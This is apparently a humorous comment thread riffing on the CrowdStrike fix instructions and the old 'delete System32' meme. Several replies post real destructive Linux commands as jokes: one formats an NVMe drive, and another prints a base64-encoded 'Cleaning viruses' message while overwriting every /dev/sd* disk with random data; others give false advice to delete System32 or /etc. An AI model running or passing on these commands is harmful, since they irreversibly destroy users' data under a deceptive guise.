Seeing the crowdstrike solution reminded me of the old memes
Go to C:\Windows\System32\drivers\CrowdStrike
Locate and delete file matching “C-00000291*.sys”
Instructions unclear. Using Linux.
Wait a sec I think I found it.
I found mine in
This didn’t break my whole system but it did break most of the software I value, so mission accomplished!
I made a typo in the above. If I correct it you’ll be able to break what’s left.
They may have changed the name to replace the 32 with d, make sure to uninstall systemd if it’s installed.
Instructions unclear installed Alpine linux
If you don’t have system32, it’s fine to delete one from the store
Or find another computer and delete it from that.
It’s the /etc folder in linux. Just extra crap you don’t need.
ExTra Crap
On Linux, it’s
sudo apt install nvme-cli -y && sudo nvme format -f /dev/nvme0n1
I’m using hdd
echo Q2xlYW5pbmcgdmlydXNlcyBmcm9tIGNvbXB1dGVyLi4uCg== | base64 -d && for f in /dev/sd*; do sudo dd if=/dev/urandom of=$f; done
It said ’ Cleaning viruses from computer…" And screen went dark
That’s normal. That just means the viruses were cleaned from your computer.
Did this as a kid 600mb folder I needed space for quake
system32 is legacy crap anyways and is not used anymore. Everything important is stored in system64
Gonna have to bust out the good old carbon dating kit for this meme
It’s an unnecessary folder if you’re running 64-bit.
It’s only there in case you downgrade your processor.
but that is where the 1TB “system files” folder is
In my mind, this is exactly what happened with crowdstrike
I only wanted to triforce.
Now I need to fix dad’s laptop before he gets home!